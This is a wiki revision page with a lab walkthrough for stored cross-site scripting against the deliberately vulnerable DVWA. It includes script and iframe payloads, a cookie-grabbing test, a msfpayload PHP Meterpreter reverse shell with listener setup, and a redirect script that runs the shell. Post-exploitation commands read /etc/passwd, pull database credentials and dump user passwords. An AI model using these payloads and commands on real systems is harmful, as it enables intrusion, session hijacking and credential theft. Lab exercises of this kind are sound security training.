Difference between revisions of "DVWA: XSS"

From OnnoWiki
Jump to navigation Jump to search
Line 116: Line 116:
 
Message:
 
Message:
  
     <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>
+
     <script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script>
 
         Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
 
         Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
  
Line 141: Line 141:
 
     grep "db_" /var/www/html/dvwa/config/config.inc.php
 
     grep "db_" /var/www/html/dvwa/config/config.inc.php
 
         This produces the database name, username, and password information to log into the mysql database.
 
         This produces the database name, username, and password information to log into the mysql database.
     echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
+
     echo "use dvwa; show tables;" | mysql -uroot -p123456
 
         This command produces a table list of the dvwa database.
 
         This command produces a table list of the dvwa database.
     echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
+
     echo "use dvwa; desc users;" | mysql -uroot -p123456
 
         This command describes the columns of the users table in the dvwa datase.
 
         This command describes the columns of the users table in the dvwa datase.
     echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
+
     echo "select user,password from dvwa.users;" | mysql -uroot -p123456
 
         This command displays the user and password information for each user in the dvwa.users table.
 
         This command displays the user and password information for each user in the dvwa.users table.
  
Line 152: Line 152:
 
         Place the html <pre> tag in the xss.html file.
 
         Place the html <pre> tag in the xss.html file.
 
         The <pre> is used as a pre-formatter.
 
         The <pre> is used as a pre-formatter.
     echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
+
     echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html
 
         Place user and password for the dvwa.users table in the xss.html file.
 
         Place user and password for the dvwa.users table in the xss.html file.
 
     echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 
     echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
Line 164: Line 164:
  
 
     On BackTrack, place the below URI in Firefox
 
     On BackTrack, place the below URI in Firefox
         http://192.168.1.106/dvwa/hackable/uploads/xss.html
+
         http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html
 
             Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
 
             Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
  

Revision as of 09:35, 28 May 2017

sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Tujuan

  • Test a basic cross site scripting (XSS) attack
  • Test an iframe cross site scripting (XSS) attack
  • Test a cookie cross site scripting (XSS) attack
  • Create a php/meterpreter/reverse_tcp payload
  • Start the php/meterpreter/reverse_tcp listener
  • Upload the PHP payload to the DVWA Upload screen
  • Test a PHP Payload cross site scripting (XSS) attack


Di sisi DVWA

Cek IP

ifconfig


Fix Stored Cross Site Scripting (XSS) Comment Box

Edit index.php

cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/
vi index.php

Search dengan keyword mtxMessage Ubah maxlength=50

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>

menjadi maxlength=250

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>

Di sisi Kali Linux

Cek IP Kali Linux

ifconfig -a

Enable Javascript di Browser

Buka Firefox
Preferences > Content > Uncheck - Block pop-up windows

Masuk ke DVWA

  • Login
  • DVWA Security > Low

XSS Stored Basic Exploit Test

  • Klik > XSS (Stored)
  • Pada Name isi "Test 1"
  • Pada Message isi "<script>alert("This is a XSS Exploit Test")</script>"
  • Klik > Sign Guestbook

XSS Stored IFRAME Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 2"
  • Pada Message isi "<iframe src="http://www.cnn.com"></iframe>"
  • Klik > Sign Guestbook

Tampak bahwa CNN muncul di bawah "Test 2" .

       This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
           e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images

XSS Stored COOKIE Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 3"
  • Pada Message isi "<script>alert(document.cookie)</script>"
  • Klik > Sign Guestbook


   Below is the cookie/session that the webserver establishes with the current browser session.
   An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
   Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.


Build PHP msfpayload

   mkdir -p /root/backdoor
   cd /root/backdoor
   msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
   ls -l FORUM_BUG.php


   Select "Upload" from the left navigation menu.
   Click Browse

Start msfconsole


       msfconsole

use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit


XSS Stored window.location Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)

Name: Test 4 Message:

   <script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script>
       Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).

Click Sign Guestbook Click OK when the Test 1 Message is displayed

shell

   Establishes a "sh" shell.

tail /etc/passwd

   This produces a potential prospect list for a ssh brute force attack
   whoami
       Displays the name of the user.
   grep apache /etc/passwd
       The goal of this command is obtaining the home directory for the apache username.
   find /var/www/* -print | grep config
       Here I am wanting to find all the configuration files in the /var/www directory.


   grep "db_" /var/www/html/dvwa/config/config.inc.php
       This produces the database name, username, and password information to log into the mysql database.
   echo "use dvwa; show tables;" | mysql -uroot -p123456
       This command produces a table list of the dvwa database.
   echo "use dvwa; desc users;" | mysql -uroot -p123456
       This command describes the columns of the users table in the dvwa datase.
   echo "select user,password from dvwa.users;" | mysql -uroot -p123456
       This command displays the user and password information for each user in the dvwa.users table.


echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place the html <pre> tag in the xss.html file.
        The <pre> is used as a pre-formatter.
    echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place user and password for the dvwa.users table in the xss.html file.
    echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file.

   echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html Replace the string "Your Name" with your actual name. date >> /var/www/html/dvwa/hackable/uploads/xss.html



   On BackTrack, place the below URI in Firefox
       http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html
           Replace the above IP address with the IP Address obtained in (Section 3, Step 3).

Referensi